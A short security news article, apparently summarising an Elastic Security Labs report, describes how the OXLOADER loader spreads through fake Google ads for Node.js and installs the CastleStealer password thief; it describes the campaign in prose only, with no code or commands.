Skip to content

OXLOADER: New Malware Loader Spreading via Google Ads

The point: A new loader called OXLOADER is being distributed via malvertising on Google and installs the infostealer CastleStealer using sophisticated obfuscation techniques with very low detection rates.

Security analysts from Elastic Security Labs have documented a campaign in which the malware loader OXLOADER is being distributed via manipulated Google ads. The goal is to install the password thief CastleStealer on victim systems.

The campaign, internally designated REF8372, exploits fake advertisements in the Google network. The ads appear in search results for popular software such as the LTS version of Node.js and redirect users to manipulated websites. The ads ran under the name of a Ukrainian advertising account; Google removed the campaign in mid-May 2026.

On the fake website, a malicious script is delivered via the cloud storage service Storj. The script displays a fake installation dialog while downloading the OXLOADER file via PowerShell in the background. OXLOADER requests UAC privileges and then uses DLL side-loading to load a manipulated library that decrypts and executes the .NET-based infostealer CastleStealer in system memory.

OXLOADER employs multiple obfuscation techniques: control flow flattening, opaque predicates, mixed boolean arithmetic, self-modifying decryption stubs, and abusive use of the Windows .reloc section for shellcode. This technical construction results in very low detection rates by static scanners and sandbox systems.

CastleStealer is specifically designed to extract system data, passwords, and cryptocurrency information. OXLOADER contains exclusion criteria that abort the infection if the system is configured for a language or region of the Commonwealth of Independent States. According to the analysts, this indicates that the actors are based in the Russian-speaking region and primarily pursue financial objectives.


Source: www.it-daily.net · Published 24 June 2026
Lumi AI News — AI-assisted curation in accordance with Art. 50 EU AI Act. Paraphrasing and classification by Lumi News Pipeline v1.7.1.

Share on: